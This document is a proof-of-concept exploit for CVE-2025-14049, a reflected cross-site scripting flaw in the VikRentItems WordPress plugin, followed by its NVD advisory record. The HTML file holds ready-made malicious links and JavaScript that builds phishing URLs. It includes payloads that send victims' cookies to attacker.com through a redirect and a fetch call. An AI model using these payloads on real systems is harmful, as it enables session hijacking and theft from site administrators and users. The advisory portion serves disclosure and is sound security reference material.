CVE-2025-14049

<!-- CVE-2025-14049 PoC - Reflected XSS in VikRentItems Plugin --> <!-- Target: WordPress site with VikRentItems plugin <= 1.2.0 --> <!-- Attack Vector: Malicious URL with 'delto' parameter containing XSS payload --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14049 PoC</title> </head> <body> <h3>CVE-2025-14049 - VikRentItems Reflected XSS PoC</h3> <!-- Basic XSS Payload --> <p>Basic XSS Test:</p> <a href='http://target-wordpress-site.com/wp-admin/admin.php?page=vikrentitems&task=deliverymap&delto=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E'> Click Here (Malicious Link) </a> <!-- Cookie Stealing Payload --> <p>Cookie Stealing Payload:</p> <a href='http://target-wordpress-site.com/wp-admin/admin.php?page=vikrentitems&task=deliverymap&delto=%22%3E%3Cscript%3Edocument.location=%27https://attacker.com/steal.php?c=%27+document.cookie%3C/script%3E'> Click Here (Cookie Stealer) </a> <!-- Encoded Payload for Bypass --> <p>Encoded Payload (URL Encoded):</p> <a href='http://target-wordpress-site.com/wp-admin/admin.php?page=vikrentitems&task=deliverymap&delto=%3Cimg%20src=x%20onerror=alert(document.domain)%3E'> Click Here (Image Tag Bypass) </a> <script> // Automated PoC testing function testXSS() { var targetBase = 'http://target-wordpress-site.com/wp-admin/admin.php'; var params = 'page=vikrentitems&task=deliverymap&delto='; var payload = '<script>alert("XSS Vulnerable")<\/script>'; var maliciousUrl = targetBase + '?' + params + encodeURIComponent(payload); console.log('Malicious URL:', maliciousUrl); // In real attack, this URL would be sent to victims return maliciousUrl; } // Generate phishing URL function generatePhishingURL() { var base = 'http://target-wordpress-site.com/wp-admin/admin.php'; var xssPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)<\/script>'; return base + '?page=vikrentitems&task=deliverymap&delto=' + encodeURIComponent(xssPayload); } </script> </body> </html>

{"cve": {"id": "CVE-2025-14049", "sourceIdentifier": "[email protected]", "published": "2025-12-12T08:15:47.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VikRentItems Flexible Rental Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'delto' parameter in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vikrentitems/tags/1.2.0/site/views/deliverymap/tmpl/default.php#L277", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vikrentitems/trunk/site/views/deliverymap/tmpl/default.php#L277", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414595%40vikrentitems&new=3414595%40vikrentitems&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/51b56dc5-0d2d-4fa9-872c-4193f61c165f?source=cve", "source": "[email protected]"}]}}